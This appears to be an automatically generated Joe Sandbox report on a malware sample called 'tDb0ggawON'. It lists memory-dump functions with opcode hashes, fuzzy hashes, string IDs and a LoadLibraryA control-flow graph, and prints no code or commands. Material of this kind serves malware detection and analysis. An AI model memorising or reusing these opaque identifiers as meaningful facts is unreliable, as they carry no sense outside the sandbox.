                                                                                                                                                    • Instruction Fuzzy Hash: 5161F074E152098FCB04CFA9D5809EEFBF2FF89210F24946AD506B7324D374AA418F55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017FF010 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: jQd$|%n
                                                                                                                                                    • API String ID: 0-2638532043
                                                                                                                                                    • Opcode ID: 6077707e40339d4d778155f2046ea51e066b460e75d14bf6e3966ef9d1298bd5
                                                                                                                                                    • Instruction ID: 322ce545731b57c7d4f4887b41375f898546923e890dea903fdb23b558f4c233
                                                                                                                                                    • Opcode Fuzzy Hash: 6077707e40339d4d778155f2046ea51e066b460e75d14bf6e3966ef9d1298bd5
                                                                                                                                                    • Instruction Fuzzy Hash: 65B10B75E14259CBDB14CFA9C980AAEFBB2FF89304F2485A9D508AB315DB309941CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3EE0 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ;$;
                                                                                                                                                    • API String ID: 0-2543639521
                                                                                                                                                    • Opcode ID: 631c75db02353fad9947aefb729b26316f799d71c0e752d3b30efc844deb8488
                                                                                                                                                    • Instruction ID: 4f76fd474f09894cc81d307ce39147c7a03f0dd4d606a15781998eb88267bd89
                                                                                                                                                    • Opcode Fuzzy Hash: 631c75db02353fad9947aefb729b26316f799d71c0e752d3b30efc844deb8488
                                                                                                                                                    • Instruction Fuzzy Hash: F881DE74A15219CFCB04CFA9D5849AEFBF2FF88310F14956AE515AB324D330AA46CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F5100 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d,=$d,=
                                                                                                                                                    • API String ID: 0-1433231585
                                                                                                                                                    • Opcode ID: 0d350eddc7076f3f6b39507655f549dbd56907cde30e1ed28ed2f3972fe7b8c3
                                                                                                                                                    • Instruction ID: c917d78fbf7716b55303bd1429b72ef99042507b81e7ae13755f24d2b195bed7
                                                                                                                                                    • Opcode Fuzzy Hash: 0d350eddc7076f3f6b39507655f549dbd56907cde30e1ed28ed2f3972fe7b8c3
                                                                                                                                                    • Instruction Fuzzy Hash: 5141C7B0E0460A9FCB48CFAAC8815AEFBF2BF88300F14C569D519A7314D7349A51CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017FDA00 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 1c
                                                                                                                                                    • API String ID: 0-1502518657
                                                                                                                                                    • Opcode ID: e57e20efb7f992cb816c7ba2d526b1878dab1decdb1321cc060aebc4de3745db
                                                                                                                                                    • Instruction ID: ed83f8d678b5190b016671dc916f128cb33c75dd57755a466f056e7b9fc5bab7
                                                                                                                                                    • Opcode Fuzzy Hash: e57e20efb7f992cb816c7ba2d526b1878dab1decdb1321cc060aebc4de3745db
                                                                                                                                                    • Instruction Fuzzy Hash: 07715B70E141598BDB14DFAAD9809AEFBB2FF89304F24C569D918A730AD7309E41CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F4D48 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (YsU
                                                                                                                                                    • API String ID: 0-951894716
                                                                                                                                                    • Opcode ID: 44ccd26cd7da5b3fff14d374f1fbd79f016a7ce8f821f5cbd6be18ae2150c07c
                                                                                                                                                    • Instruction ID: b911283ef16b0fd47aeedeac08bbbeacfc4a8f706c191a1aa5a5aae8c04a5b53
                                                                                                                                                    • Opcode Fuzzy Hash: 44ccd26cd7da5b3fff14d374f1fbd79f016a7ce8f821f5cbd6be18ae2150c07c
                                                                                                                                                    • Instruction Fuzzy Hash: C4511871E1520ADFCB04CFAAC4419AFFBB2BF89300F14856AD655A7345D734AA828F90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F4D58 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (YsU
                                                                                                                                                    • API String ID: 0-951894716
                                                                                                                                                    • Opcode ID: a75d76d88357c88806deb69eee93910aeadca811d1bf92742f89be6fd6260f56
                                                                                                                                                    • Instruction ID: 3d13da8aee0d9683ddfefdf23bb7b82856b3229d45283b1fdfc62f8168d5fc9f
                                                                                                                                                    • Opcode Fuzzy Hash: a75d76d88357c88806deb69eee93910aeadca811d1bf92742f89be6fd6260f56
                                                                                                                                                    • Instruction Fuzzy Hash: 79613971D1520ADFCB04CFA9D4819EFFBB2BF88300F148569D656A7344D334AA828F90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09F10714 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: UUUU
                                                                                                                                                    • API String ID: 0-1798160573
                                                                                                                                                    • Opcode ID: 19314dbe7e5b44cbe88522c1cc6be4e948b5bb154555e18b953d8184a04f23fd
                                                                                                                                                    • Instruction ID: a8c17c7b01cc96a6dc11c9292ffeecc73d9d2124dd54ccca8a9fa1a15bd4f373
                                                                                                                                                    • Opcode Fuzzy Hash: 19314dbe7e5b44cbe88522c1cc6be4e948b5bb154555e18b953d8184a04f23fd
                                                                                                                                                    • Instruction Fuzzy Hash: DF513C74E106288FDB64CFADC884A9DFBF1BF88304F1485A9D468EB209D774A946CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F50F0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d,=
                                                                                                                                                    • API String ID: 0-1871403597
                                                                                                                                                    • Opcode ID: b929731c5d8204c99f8aee01076c14cce161184162fe08079f8ded8b08e06be7
                                                                                                                                                    • Instruction ID: 4780b3afa85c71003661a28613ae19bf7bd2bdaaa7629d06d34430368bd093a9
                                                                                                                                                    • Opcode Fuzzy Hash: b929731c5d8204c99f8aee01076c14cce161184162fe08079f8ded8b08e06be7
                                                                                                                                                    • Instruction Fuzzy Hash: EF41F3B0E0460A9FCB04CFAAC8815AFFBF2AF89300F24C56AC515AB314D7349A55CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09F10040 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: v
                                                                                                                                                    • API String ID: 0-1801730948
                                                                                                                                                    • Opcode ID: 1368a495d1ca8d08b79393709c32076a5aa12e61c6e08c3d9ded40ba5712a912
                                                                                                                                                    • Instruction ID: 174fcca6f46cf5873c09a33f267ea187ad66ee6ccd6a52abbdb580272d41684c
                                                                                                                                                    • Opcode Fuzzy Hash: 1368a495d1ca8d08b79393709c32076a5aa12e61c6e08c3d9ded40ba5712a912
                                                                                                                                                    • Instruction Fuzzy Hash: 5A311271E056188BEB1CCF6B8C4069EFAF7BFC9300F18D1B9981DAA254EB7406468F55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4E5B8 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c08948a776f09ca9427964eb1b6c263e59cdf70bc73b025b34ca590479302ae6
                                                                                                                                                    • Instruction ID: a045593947102d40ed55af692252f9dc76435f5e4086b79a0e1d22bfe3d41ea1
                                                                                                                                                    • Opcode Fuzzy Hash: c08948a776f09ca9427964eb1b6c263e59cdf70bc73b025b34ca590479302ae6
                                                                                                                                                    • Instruction Fuzzy Hash: 5C12E8F18117468BE330EF65F99C299BBA1F741328F904228D2652FAD9D7B4934ACF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4C0FC Relevance: .3, Instructions: 265COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3d618da34eb34340025544c9bf0ce1a44a40b98288b84ffb054b3d3066663828
                                                                                                                                                    • Instruction ID: 856db99308b2a51523961493b0fdc9ff4b32b2c499c0b17e20c2a0dfaca62e6b
                                                                                                                                                    • Opcode Fuzzy Hash: 3d618da34eb34340025544c9bf0ce1a44a40b98288b84ffb054b3d3066663828
                                                                                                                                                    • Instruction Fuzzy Hash: 2BA15C32E002198FCF05DFA5C9449AEBBF2FFC5310B15856AE916BB221EB75A945CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05A4E5A8 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bb165101cde290bd3ec74ac831408e4cea1549a1473f2dc185dc9971424bda63
                                                                                                                                                    • Instruction ID: a4fed6f5bff0d6637c2ae84fc43778f90fecf984183a42b590f69b569fcab8f4
                                                                                                                                                    • Opcode Fuzzy Hash: bb165101cde290bd3ec74ac831408e4cea1549a1473f2dc185dc9971424bda63
                                                                                                                                                    • Instruction Fuzzy Hash: 9FC17EB18117468BE330EF65E98C299BB71FB85328F504328D2612F6D9E7B49386CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3ED1 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 011dcdbfbb40aa366b8bf2e0c5b52c4d17718910c2619db4adf8c912e43c02b7
                                                                                                                                                    • Instruction ID: cfb4d40917a4a9fc0af614a88ce0e070094acdcf5b0cce006a1d05f582376dc1
                                                                                                                                                    • Opcode Fuzzy Hash: 011dcdbfbb40aa366b8bf2e0c5b52c4d17718910c2619db4adf8c912e43c02b7
                                                                                                                                                    • Instruction Fuzzy Hash: 57811234A15219CFCB04CFA9D5849AEFBF2FF89310F1495AAE515AB324D330AA42CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F5548 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 984e0cac20e149c85871cf33502d290cda34e32c3738a497d9b80834ef5f7983
                                                                                                                                                    • Instruction ID: 2a82b8fdf671e632afeacfd763e64f4de54c5e9a9d0b5b8d9aacb4794d45131a
                                                                                                                                                    • Opcode Fuzzy Hash: 984e0cac20e149c85871cf33502d290cda34e32c3738a497d9b80834ef5f7983
                                                                                                                                                    • Instruction Fuzzy Hash: 2551E4B0E1520ADBCB04CFAAC5855AEFBF2AF89350F24946AC615FB314D7349A418F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F5538 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f367ad363fd41b7d2790e3e9afb0f5fbaa039a32df33c9faf22b86e23fc1f09b
                                                                                                                                                    • Instruction ID: b936f7d7345dce69313ddfc02ba1c8023f1c3f6c3ba18d0ab0e782f47adcc13c
                                                                                                                                                    • Opcode Fuzzy Hash: f367ad363fd41b7d2790e3e9afb0f5fbaa039a32df33c9faf22b86e23fc1f09b
                                                                                                                                                    • Instruction Fuzzy Hash: 5F51F2B0E1520A9FCB44CFAAC5855AEFBF2AF89350F24C46AC515E7314E3349A41CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017FC608 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c4ab4ca827d673fc58434e2c3e525a01cca0d268812bdccaf03428a3c756157c
                                                                                                                                                    • Instruction ID: 114b3b396b312284a7e5e2632f8fadec8c8bd059467b407682cc79fbc8c93460
                                                                                                                                                    • Opcode Fuzzy Hash: c4ab4ca827d673fc58434e2c3e525a01cca0d268812bdccaf03428a3c756157c
                                                                                                                                                    • Instruction Fuzzy Hash: 4A512A70E156188FDB19CF69D981A9EFBB2FF88310F1090A9D909A7364DB309A41CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F3519 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 80d76c465e8dc80beab94ca044b11f0d44404442c079ae8d365c0cec34157abb
                                                                                                                                                    • Instruction ID: 84fdbbf3fea5967c1e884e5ef77aa9fbce9453db6c83f1d38100a0280c1d8689
                                                                                                                                                    • Opcode Fuzzy Hash: 80d76c465e8dc80beab94ca044b11f0d44404442c079ae8d365c0cec34157abb
                                                                                                                                                    • Instruction Fuzzy Hash: 5D414770E046599BCB04CFA9C8845EEFBF2BF89320F28D699D525A7315D7309941CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F5760 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b37adfa1cf423fb2d44591a18318492a9e9462eed2d8054ce96dbe4d911a6d86
                                                                                                                                                    • Instruction ID: a18d667d679fc225f627d85fc63233af1ce65fd722705ba85c3e8fc407b0e154
                                                                                                                                                    • Opcode Fuzzy Hash: b37adfa1cf423fb2d44591a18318492a9e9462eed2d8054ce96dbe4d911a6d86
                                                                                                                                                    • Instruction Fuzzy Hash: C6412971E11658CBEB68CF6B9D4469EFAF3BFC9300F14C1BA850DA6218DB701A958F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 017F5750 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 043b5cfe55d5b2a02e528cf9b91770789c954882e3a2658e47576f52e7acc6b0
                                                                                                                                                    • Instruction ID: 7bcf335a91d767e824d776365bc235959eec3960476efc39cc31bb7454f63585
                                                                                                                                                    • Opcode Fuzzy Hash: 043b5cfe55d5b2a02e528cf9b91770789c954882e3a2658e47576f52e7acc6b0
                                                                                                                                                    • Instruction Fuzzy Hash: CB414DB1E016588BDB68CF6B9D4429EFBF3BFC9300F14C1BA854DA6265DB301A458F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:16.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:6
                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                    execution_graph 13549 78c72f0 13550 78c730e 13549->13550 13553 78c56dc 13550->13553 13552 78c7345 13554 78c8e10 LoadLibraryA 13553->13554 13556 78c8eec 13554->13556

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 08260013 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f3ea6c49d970e16bbe531404887090e88ca2071cbaf3acf6d8d41e570952200d
                                                                                                                                                    • Instruction ID: cae09d9e015a2e1f8dab651920429e6c2986c080df3fa29ff21e248707172ba4
                                                                                                                                                    • Opcode Fuzzy Hash: f3ea6c49d970e16bbe531404887090e88ca2071cbaf3acf6d8d41e570952200d
                                                                                                                                                    • Instruction Fuzzy Hash: 5F515570D06268CFDB25DFA4C958BEDBBB1AF49210F1480EAC409BB2A1DB354A85CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 078C8E04 Relevance: 1.6, APIs: 1, Instructions: 93libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 412 78c8e04-78c8e67 414 78c8e69-78c8e73 412->414 415 78c8ea0-78c8eea LoadLibraryA 412->415 414->415 416 78c8e75-78c8e77 414->416 422 78c8eec-78c8ef2 415->422 423 78c8ef3-78c8f24 415->423 417 78c8e79-78c8e83 416->417 418 78c8e9a-78c8e9d 416->418 420 78c8e85 417->420 421 78c8e87-78c8e96 417->421 418->415 420->421 421->421 424 78c8e98 421->424 422->423 426 78c8f34 423->426 427 78c8f26-78c8f2a 423->427 424->418 430 78c8f35 426->430 427->426 429 78c8f2c 427->429 429->426 430->430
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 078C8EDA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520560124.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_78c0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 5a256a213826d9209d8cddac5657609cbbff08b404b29c8eed3e14fc7058529a
                                                                                                                                                    • Instruction ID: 049d5bbfb3987bbdc697ad145da6c828bf77a72dd5d94e94f77b30627ff860a7
                                                                                                                                                    • Opcode Fuzzy Hash: 5a256a213826d9209d8cddac5657609cbbff08b404b29c8eed3e14fc7058529a
                                                                                                                                                    • Instruction Fuzzy Hash: 043132B0D102598FDB14CFA9C8887DEBBB6AB18314F14852DE815EB340D7789845CF96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 078C56DC Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 431 78c56dc-78c8e67 433 78c8e69-78c8e73 431->433 434 78c8ea0-78c8eea LoadLibraryA 431->434 433->434 435 78c8e75-78c8e77 433->435 441 78c8eec-78c8ef2 434->441 442 78c8ef3-78c8f24 434->442 436 78c8e79-78c8e83 435->436 437 78c8e9a-78c8e9d 435->437 439 78c8e85 436->439 440 78c8e87-78c8e96 436->440 437->434 439->440 440->440 443 78c8e98 440->443 441->442 445 78c8f34 442->445 446 78c8f26-78c8f2a 442->446 443->437 449 78c8f35 445->449 446->445 448 78c8f2c 446->448 448->445 449->449
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 078C8EDA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520560124.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_78c0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 3e3e4df977ac10fbb893a8bc5e211f717949a86a31aa59865250ea36cdbcd1b1
                                                                                                                                                    • Instruction ID: 6dbed32e5b09b99fbf6be08f3ef8b15f09b0e25183301bfbfeaf87e04035a929
                                                                                                                                                    • Opcode Fuzzy Hash: 3e3e4df977ac10fbb893a8bc5e211f717949a86a31aa59865250ea36cdbcd1b1
                                                                                                                                                    • Instruction Fuzzy Hash: AD3143B0D10249CFDB14CFA8C88479EBBF6AB19314F14852DE815E7340D7789845CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 08260040 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
